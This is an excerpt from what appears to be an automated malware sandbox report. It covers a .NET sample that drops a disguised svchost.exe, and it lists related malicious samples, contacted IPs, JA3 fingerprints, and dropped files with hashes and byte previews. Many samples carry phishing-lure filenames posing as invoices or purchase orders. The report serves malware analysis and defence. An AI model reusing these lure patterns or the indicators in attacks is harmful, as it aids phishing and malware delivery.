                                                                        • 172.67.150.212
                                                                        20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        items list.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        SKMC25832100083932157.jarGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        PO75773937475895377.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        smtp.yandex.ruSwift_Copy.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        C6RET8T1Wi.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        RFQ# ZAT77095_pdf.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        AL JUNEIDI LIST.xlsxGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        SWIFT.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        Payment _Advice (2).exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        cricket.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        SG1_000000123205044_1.pdf.gz.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        Ordine d'acquisto 240517_04062021.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        Order 01042021-V728394-H16.pdf.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        RFQ#EX50GO_pdf.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        TRANSACTION_INTTRANSFER_1617266945242 MEDICON_PDF.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        Shandong CIRS Form.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        DHL_DELIVERY_CONFIRMATION_CBJ002042021068506.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        REQUEST QUOTATION BID..pdf.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        RFQ#ZAEL67012_doc.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        Q99Eljz7IT.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        SecuriteInfo.com.Trojan.PackedNET.576.12750.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        Swift Copy Against due Invoice.PDF.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158
                                                                        PO#ZA3MMA_pdf.exeGet hashmaliciousBrowse
                                                                        • 77.88.21.158

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        CLOUDFLARENETUSFFSetup5.7.1.0.exeGet hashmaliciousBrowse
                                                                        • 104.18.88.101
                                                                        order-invoice-amazon-#D01-9237793-8041853.DOCX.vbsGet hashmaliciousBrowse
                                                                        • 162.159.134.233
                                                                        PAGO.xlsxGet hashmaliciousBrowse
                                                                        • 104.25.234.53
                                                                        PaymentAdvice.exeGet hashmaliciousBrowse
                                                                        • 104.21.85.234
                                                                        PRODUCT_INQUIRY_PO_0009044_PDF.exeGet hashmaliciousBrowse
                                                                        • 104.21.19.200
                                                                        nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                                        • 162.159.133.233
                                                                        CWlXbVUJab.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        ETL_126_072_60.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        IMG_102-05_78_6.docGet hashmaliciousBrowse
                                                                        • 172.67.150.212
                                                                        MT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                                                        • 172.67.188.154
                                                                        PO4308.exeGet hashmaliciousBrowse
                                                                        • 104.21.49.158
                                                                        pumYguna1i.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                        • 104.21.65.7
                                                                        Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                        • 104.21.48.10
                                                                        0BAdCQQVtP.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        lfQuSBwdSf.exeGet hashmaliciousBrowse
                                                                        • 172.67.188.154
                                                                        TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        AQJEKNHnWK.exeGet hashmaliciousBrowse
                                                                        • 23.227.38.74
                                                                        hvEop8Y70Y.exeGet hashmaliciousBrowse
                                                                        • 172.67.219.254

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        54328bd36c14bd82ddaa0c04b25ed9adorder-invoice-amazon-#D01-9237793-8041853.DOCX.vbsGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        CWlXbVUJab.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        MT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        lfQuSBwdSf.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        RFQ-034.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        kayo.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        new_order20210408_14.docGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        BL01345678053567.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        SER09090899.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        cricket.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        20200804-8293847pdf.scr.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119
                                                                        234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                                        • 104.21.56.119

                                                                        Dropped Files

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exenew_order20210408_14.docGet hashmaliciousBrowse
                                                                          new_order20210408_14.docGet hashmaliciousBrowse

                                                                            Created / dropped Files

                                                                            C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                            Process:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):46592
                                                                            Entropy (8bit):5.935771952119223
                                                                            Encrypted:false
                                                                            SSDEEP:768:67mDHfLLLkF0FenHiwAGflA7qOSn8bQ1xHWBnBeladzvRwyx0klmJc7z6GkZCcoz:7/ngF0m/87qOSn8bQ1xHWBnBeladzvRj
                                                                            MD5:D6B29ADD344D2284845F133B8505126E
                                                                            SHA1:FDB44B36F8C31A60A47DB4F4CE6D4975367D7A7C
                                                                            SHA-256:552A8D763C86BB50DED18CF8F790F18828C471EC5A4D3CAC71EAF7693314A04C
                                                                            SHA-512:7EC6E7F8F2EBE947B8B05EB4880D6A34D8B92965E7548FB5038716D5912BC299E3078B755373DF9B7414B61154E625D7B689FBD1F39DFB4363F382449BCE7FF6
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 27%
                                                                            Joe Sandbox View:
                                                                            • Filename: new_order20210408_14.doc, Detection: malicious, Browse
                                                                            • Filename: new_order20210408_14.doc, Detection: malicious, Browse
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..j...J.......... ........@.. ....................... ......}.....@.................................t...W.......dF...........t............................................................... ............... ..H............text....i... ...j.................. ..`.rsrc...dF.......H...l..............@..@.reloc..............................@..B........................H........5..dT...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....rA..p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....rA..p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........rE..p.+..........s......%r[..p .........%.r...p.%.r...p.%.r...p
                                                                            C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe:Zone.Identifier
                                                                            Process:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):0.598865677794713
                                                                            Encrypted:false
                                                                            SSDEEP:6:0FE2XlEk1GaD0JOCEfMuaaD0JOCEfMKQmDQ8tAl/gz2cE0fMbhEZolrRSQ2hyYI8:0FXlrGaD0JcaaD0JwQQhtAg/0bjSQJ
                                                                            MD5:F11E15B78472F69B97503D4292D070BA
                                                                            SHA1:CD50BD1BEA2B1E0BCAAA45BDAC279F22CBDAF56F
                                                                            SHA-256:0750B07423BAC72248234A2F301C6ACFC867DBFEF6E65DAB0122A9C9ACBBD7E6
                                                                            SHA-512:CA06DF48F128A82919E920B490F9C6474C88E67FBDD7374AE7AB1CC5C51672D6338478A0A94CA66650403463F737BA1822C33BA14D35B6AEC138545368CF33AB
                                                                            Malicious:false
                                                                            Preview: ......:{..(.....,2...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................,2...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xef57c920, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):32768
                                                                            Entropy (8bit):0.09640757787442658
                                                                            Encrypted:false
                                                                            SSDEEP:12:10+FNaXO4blElt8KL0+FNaXO4blElt8K:WIltQIlt
                                                                            MD5:719EFD2A4713236D0F5769706A8C0F07
                                                                            SHA1:4F2514E71BDB797404693EAAFE7750D0F4F21C17
                                                                            SHA-256:9F1BBDE7A73E6B43C2A3815580F73525A284EA8553114352F7A44B62274DBCC3
                                                                            SHA-512:6AD8BE15F1BB390034758CB8532ADF81D5FDF8D748DA88266E77A34F717971367F64049106C68A330FAC5A8D743FB814D595D50ABDCFA7D8595781D65D13689C
                                                                            Malicious:false
                                                                            Preview: .W. ... ................e.f.3...w........................&..........w..,2...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................(,2...y_o................>[j.,2...y_.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):0.11144688789275213
                                                                            Encrypted:false
                                                                            SSDEEP:3:XLEvJmTf+hl/bJdAtiwX2t9ltlall:Xy3t4faHtA
                                                                            MD5:D6C60ACE7A43017C5E256D2F766F725D
                                                                            SHA1:AC34F72323AF317CD51B7698DBE9F88DE3C7B738
                                                                            SHA-256:D2CE0D2DF4EF2376BF8986B1EE2E696E55EBA9A89E2695BEB30C6D9D802FDBA2
                                                                            SHA-512:69B0E02778A2C6F28D4D9CCAEA91653B1FBC3171B8D75AE5A285E870B56968F4D50F27D013E49E507413A3C8437A4A160B01FDFE6146758D3A18DFF9F1631048
                                                                            Malicious:false
                                                                            Preview: ...j.....................................3...w..,2...y_......w...............w.......w....:O.....w..................>[j.,2...y_.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_qINcOlwRud.exe_4be3bb70756af94f97dfbc5a159826bdd2c5e33_fab20a83_17397b09\Report.wer
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):17404
                                                                            Entropy (8bit):3.760692848238617
                                                                            Encrypted:false
                                                                            SSDEEP:192:GdR8GMmHBUZMXKaKQqueZitu/u7sUS274Itgi:oGGtBUZMXKaFmJ/u7sUX4Itgi
                                                                            MD5:2ECC39DD818EB6236B43DCE95A96EA4F
                                                                            SHA1:6886D66FF7D87B2CF3C61F9AEE350A18CAF086AB
                                                                            SHA-256:541E16382EB454B1691928CF74AFC1A557EF80B1CF2FF54E1D37A2B705D8867D
                                                                            SHA-512:0115E2548640F5DB73B92AE90266811B1096EFC3E90369B0CF5F105B7D3EEAD1A36820384680EE7F874F435FEEECE660E8CD28502ADBFD87614A317DCC035DA1
                                                                            Malicious:true
                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.8.5.0.4.7.5.8.3.9.9.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.8.5.0.5.1.4.9.0.2.4.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.e.7.9.4.f.1.-.4.5.4.9.-.4.2.b.b.-.b.4.e.3.-.2.8.d.5.5.f.6.7.c.e.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.e.6.6.6.1.7.-.6.0.8.1.-.4.d.6.2.-.a.1.1.4.-.c.f.3.e.0.2.1.4.d.a.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.I.N.c.O.l.w.R.u.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.6.4.-.0.0.0.1.-.0.0.1.7.-.3.1.2.9.-.2.a.6.8.b.0.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.b.4.4.b.3.6.f.8.c.3.1.a.6.0.a.4.7.d.b.4.f.4.c.e.6.d.4.9.7.5.3.6.
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER66E4.tmp.dmp
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Apr 8 19:50:49 2021, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):329009
                                                                            Entropy (8bit):3.5951422808438074
                                                                            Encrypted:false
                                                                            SSDEEP:3072:uroCMCRhtlXDsN068Ljd+pRyBK8L9gIOgF5S+R/yB0rpUCgUSm99ty:urXMR06pe9RpDHFyBeTjp9e
                                                                            MD5:78BA18EB705FF85216912909983D514C
                                                                            SHA1:B0261588434274F00AB23730A3D4F4362D2B029A
                                                                            SHA-256:DFBAA76E5880EA2F2CA5C28D8BA953E1175232E9AB5523F804F744791703E8E2
                                                                            SHA-512:59EBA97CC681120A1BF3552BC8461D3702801856938DDAB8DE46D10023FA1D7371DDB4EBADAC4A4005FE63B82452F63536707D0933BD1EB428145C7969D475B4
                                                                            Malicious:false
                                                                            Preview: MDMP....... ........^o`...................U...........B......l1......GenuineIntelW...........T.......d...|^o`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7462.tmp.WERInternalMetadata.xml
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8404
                                                                            Entropy (8bit):3.697338148612842
                                                                            Encrypted:false
                                                                            SSDEEP:192:Rrl7r3GLNirh6O6YS+SU4GoBgmfZ7SZCprC89bu0sf66m:RrlsNid6O6YbSU4GoBgmflSqunfO
                                                                            MD5:A24C4A4DA2D157C546DB803C12A13277
                                                                            SHA1:152C35E5642E98DAAB8A2E1FB12DB6BA5643620A
                                                                            SHA-256:1C66F3F6A851E8E020FA4961574CAE4ADF70CBA2291A6CDC1CC4B7F8C748A3D6
                                                                            SHA-512:881F967BA3F3270FFCA7EC4531BAFA977022673BB3E4B56B98E0061A2D8A09115377AFB1B2638705E73E5188136F7FADC652C94EDF5858AFFBFC70DF3A5BBEEF
                                                                            Malicious:false
                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.7.6.<./.P.i.d.>.......
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER755D.tmp.xml
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4750
                                                                            Entropy (8bit):4.474981915187786
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwSD8zsXrJgtWI9pC2WSC8Be8fm8M4JUFFXw8+q8vQJE95b8Ndd:uITfXFLXSNxJWKqE7gNdd
                                                                            MD5:B656986BEA33064CD7B76CA4F2D1BDF8
                                                                            SHA1:94B9FA584477E84137B1D9F8C82429A4A319A503
                                                                            SHA-256:81744C814B4290707D32573DCA01569E379FFB1DF1CB23FBD131602C8D926268
                                                                            SHA-512:59F183D342547FEB6EEBD056C8B2D95A0DD1C6A6E655179C701CFAE6889821E58EB533F0A6655F5AB868F3AAA34002A9310653DF63F534BFB0EA6F402A434628
                                                                            Malicious:false
                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937741" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):698
                                                                            Entropy (8bit):5.049094101509586
                                                                            Encrypted:false
                                                                            SSDEEP:12:reVGyMYx2Y5BYtmWNUc5AtYX5E4a2KryMYGH+ptsxptsOtw9O9S8:reUyMGF5ytmLcetYX5E2KryMb+zsxzsk
                                                                            MD5:B0CEEA53B3467F59FD8E87F80213BDE9
                                                                            SHA1:D9E6D1CBB480E7248658DF935648DFA733745602
                                                                            SHA-256:D9C93CB64E6F1F5BDC94581CEEA99F759EE1E35716EAF623C61962EA0152F9DD
                                                                            SHA-512:DDAA6C9FA3535B4926C60B692F8E202D10EB160D1F8BE7A9DE79239EF75AFD470403DF1D8F0CBF29A5F819E907D02E8E656BB9A52E71E30D9259987EAE881655
                                                                            Malicious:false
                                                                            Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11001645378947394
                                                                            Encrypted:false
                                                                            SSDEEP:12:264cNXm/Ey6q9995j1O5Cq3qQ10nMCldimE8eawHjcI:26yl68YHLyMCldzE9BHjcI
                                                                            MD5:52E7CD9CFE951AFF43554E0DE3B8B997
                                                                            SHA1:67242D8897B64653B9D88DE38A7DD2325C4001C2
                                                                            SHA-256:E648F33AD6FAFDF5C98C44E00B9693EBCE7F808E7468A2FF0EF9AB166464449F
                                                                            SHA-512:3557CF24C4ABB4E4EC767DCB0401D1F232990AD4788A4F42966C1DCF4893ADAAF60F6D1AB603498161A61C81C77B31BFF4F22C9126B66FD8BE7BC0A259E46064
                                                                            Malicious:false
                                                                            Preview: ........................................................................................b........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................-.../..... .......~.,..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........].......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11240757952414504
                                                                            Encrypted:false
                                                                            SSDEEP:12:kQjXm/Ey6q9995j151miM3qQ10nMCldimE8eawHza1miIIt6P:Ql68J1tMLyMCldzE9BHza1tIIta
                                                                            MD5:A62CB7BB85798669FF3234E3DAC3F91D
                                                                            SHA1:F00854979E29B74D6AC1AD98F43303C609F51A19
                                                                            SHA-256:D3EDDD4F125B49B6AC3CDA732B130B53B37B6FC8CE20937E8D053ADC56DDA24A
                                                                            SHA-512:808F38A4B21429498E737F63B3CCAFBD45F48CD3B7715558877F8843B5CD1C3669D8961158299CF9A1353862530F7906A7489E145C32D0955AFD4ACA4ED57593
                                                                            Malicious:false
                                                                            Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................-.../..... .......r~.,..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........y.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11238374920897244
                                                                            Encrypted:false
                                                                            SSDEEP:12:kaXjXm/Ey6q9995j1ya1mK2P3qQ10nMCldimE8eawHza1mKsP:5Kl68D1iPLyMCldzE9BHza1g
                                                                            MD5:80677C026AE90172B17D5675F8516768
                                                                            SHA1:48322B64E39967C8945460B806CE05C387EE34E2
                                                                            SHA-256:36E23F16C8120D7C72009B13A5E14B65D3A4DFF724B10715EA8E73410B7899B7
                                                                            SHA-512:00B9372165AB4EF18455343925D7B604A82B3689E7F8D0BA2B138A4C02CA1B27B23F63DCD5CB9782A036CE7CCB56F75994766B693AB36214C71CC84F63EE99D1
                                                                            Malicious:false
                                                                            Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................-.../..... .....l}L~.,..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_213h4kn1.bm4.psm1
